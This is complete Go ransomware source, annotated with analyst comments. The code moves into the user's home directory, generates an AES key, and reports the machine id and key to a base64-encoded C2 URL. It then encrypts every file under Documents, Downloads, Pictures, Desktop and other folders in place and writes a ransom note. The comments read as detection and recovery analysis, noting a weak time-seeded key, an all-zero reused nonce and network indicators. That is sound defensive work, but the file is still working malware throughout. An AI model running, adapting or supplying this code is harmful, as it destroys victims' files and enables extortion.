// Author : Nemuel Wainaina
/*
https://github.com/nemzyxt
*/
package main
import (
"crypto/aes"
"crypto/cipher"
"encoding/base64"
"math/rand"
"net/http"
"os"
"path/filepath"
"time"
)
// Embedded configuration. C2 and NOTE are base64 blobs that are decoded at
// runtime with from_b64. README is a relative path; main changes into the
// user's home directory before it is used.
const (
// Drop location of the ransom note.
README string = "Desktop/README.txt"
// Base64 of the reporting endpoint. The literal decodes to an http:// URL on
// 127.0.0.1:8080, i.e. a loopback listener reached over cleartext HTTP.
C2 string = "aHR0cDovLzEyNy4wLjAuMTo4MDgwLwo="
// Base64 of the ransom-note text that main writes to README.
NOTE string = "WU9VUiBGSUxFUyBIQVZFIEJFRU4gRU5DUllQVEVEICEhIQpEb24ndCBtYWtlIGFueSBzdHVwaWQgbW92ZSB0byBkZWNyeXB0IHRoZW0gb3IgZWxzZSB5b3Ugd2lsbCBoYXZlIHBlcm1hbmVudGx5IGxvc3QgYWNjZXNzIHRvIHRoZW0gISAKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjClRPIFJFQ09WRVIgVEhFTSA6CkNvbnRhY3QgdXMgaGVyZSBhbmQgcHJvdmlkZSB0aGlzIGFzIHlvdXIgaWQgOgo="
)
// Directories whose files are encrypted. The names are relative, so they
// resolve under the home directory once move_to_home has run.
var (
TGT_DIRS = []string{"Documents", "Downloads", "Music", "Pictures", "Videos", "Desktop"}
)
// main runs the full sequence: change into the home directory, generate a key,
// read the machine id, send both to the C2 endpoint, encrypt every file under
// TGT_DIRS with that single key, then write the ransom note.
//
// Behaviour visible here that is useful for detection and triage: a read of
// /etc/machine-id, outbound HTTP requests before any file is modified,
// in-place rewrites of files under the listed home sub-directories, and
// creation of Desktop/README.txt as the last step.
func main() {
move_to_home()
// generate the encryption key
k := generate_key()
id := generate_id()
// report does not return until is_online has succeeded; the outcome of the
// C2 request itself is not checked.
report(k, id)
// Encrypt the directories now; the same key is used for every file.
key := []byte(k)
for _, dir := range TGT_DIRS {
encrypt_dir(dir, key)
}
// Drop the ransom note: decoded NOTE text followed by the machine id.
// It is written after Desktop has been processed, so the note itself stays
// in plaintext. Errors from Create and WriteString are discarded.
f, _ := os.Create(README)
f.WriteString(from_b64(NOTE) + " " + generate_id())
f.Close()
}
// generate_key returns a 32-character string; main converts it to bytes and
// encrypt_file passes it to aes.NewCipher, so it serves as a 32-byte AES key.
//
// Analyst note: every character comes from a 62-symbol alphanumeric pool and
// is chosen with math/rand, a non-cryptographic generator that is re-seeded
// from the wall clock on each iteration. The key's unpredictability is
// therefore bounded by the pool and by the time-based seed, which matters when
// assessing whether a key can be reconstructed during recovery.
func generate_key() string {
key := make([]byte, 32)
pool := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
for i := range key {
// Seed is taken from the current time in nanoseconds on every pass.
rand.Seed(time.Now().UnixNano())
key[i] = pool[rand.Intn(len(pool))]
}
return string(key)
}
// generate_id returns the raw contents of /etc/machine-id as the identifier
// for this host. The read error is discarded, so a missing or unreadable file
// yields an empty string. The path is Linux-specific.
// NOTE(review): the value is returned untrimmed; presumably it carries the
// file's trailing newline — confirm against a sample.
func generate_id() string {
id, _ := os.ReadFile("/etc/machine-id")
return string(id)
}
// report sends the machine id and the encryption key to the C2 endpoint.
//
// The message is "<id>:<key>", base64-encoded and appended as a path segment
// to the decoded C2 URL, then requested with a plain http.Get. Analyst note:
// the key therefore travels inside the request path of a GET, so it can appear
// in proxy logs, web-server logs and packet captures taken on the host or
// along the network path.
//
// While is_online fails, the function sleeps five seconds and calls itself.
// There is no return after the recursive call, so each nested call also falls
// through to the send when the stack unwinds: a host that failed k
// connectivity checks issues the request k+1 times. The response and error of
// the request are discarded.
func report(key string, id string) {
if !is_online() {
time.Sleep(5 * time.Second)
report(key, id)
}
msg := id + ":" + key
http.Get(from_b64(C2) + "/" + to_b64(msg))
}
// to_b64 encodes str with the standard (padded, '+' and '/') base64 alphabet
// and returns the encoded text.
func to_b64(str string) string {
	raw := []byte(str)
	encoded := base64.StdEncoding.EncodeToString(raw)
	return encoded
}
// from_b64 decodes str using the unpadded, URL-safe base64 alphabet and
// returns the result as a string. The decode error is discarded, so the
// caller receives whatever bytes the decoder returned alongside it.
func from_b64(str string) string {
	decoded, _ := base64.RawURLEncoding.DecodeString(str)
	text := string(decoded)
	return text
}
// move_to_home changes the process working directory to the current user's
// home directory, so that the relative paths in README and TGT_DIRS resolve
// there. Errors from UserHomeDir and Chdir are discarded; on failure the
// working directory is left as it was.
func move_to_home() {
homedir, _ := os.UserHomeDir()
os.Chdir(homedir)
}
// is_online reports whether an HTTP GET to https://www.google.com completes
// without an error. The response is discarded and its status code is not
// inspected. As a network indicator, this request precedes the C2 report
// issued by report.
func is_online() bool {
_, err := http.Get("https://www.google.com")
return err == nil
}
// read_file loads the named file fully into memory and returns its bytes.
// The read error is discarded; the caller gets whatever os.ReadFile returned
// alongside it.
func read_file(file string) []byte {
	data, _ := os.ReadFile(file)
	return data
}
// encrypt_file replaces the contents of file with its AES-GCM encryption
// under key.
//
// Output layout, as produced by Seal(nonce, nonce, ...): the nonce
// (gcm.NonceSize() bytes), then the ciphertext, then the GCM tag. No
// additional authenticated data is used.
//
// Analyst note: the nonce slice is allocated and never written before Seal, so
// it is all zero bytes, and main passes the same key for every file. Every
// file on the host is thus sealed under one (key, nonce) pair, which is
// relevant when evaluating recovery options. The whole file is read into
// memory, and all errors (cipher setup, read, write) are discarded.
func encrypt_file(file string, key []byte) {
c, _ := aes.NewCipher(key)
gcm, _ := cipher.NewGCM(c)
// make() zero-fills; nothing populates the nonce afterwards.
nonce := make([]byte, gcm.NonceSize())
plaintext := read_file(file)
// dst == nonce, so the sealed data is appended after the nonce bytes.
result := gcm.Seal(nonce, nonce, plaintext, nil)
// Overwrites the original path in place; no new extension or copy is made.
os.WriteFile(file, result, 0666)
}
// list_files walks path recursively with filepath.Walk and returns the path
// of every entry that is not a directory. The callback does not look at its
// err argument and always returns nil, and the error returned by Walk itself
// is discarded.
func list_files(path string) []string {
var files []string
filepath.Walk(path, func(p string, info os.FileInfo, err error) error {
if !info.IsDir() {
files = append(files, p)
}
return nil
})
return files
}
// encrypt_dir encrypts, in place, every non-directory entry found under dir
// (recursively, via list_files), passing the same key to encrypt_file for each
// one. The file list is collected in full before the first file is rewritten.
func encrypt_dir(dir string, key []byte) {
for _, file := range list_files(dir) {
encrypt_file(file, key)
}
}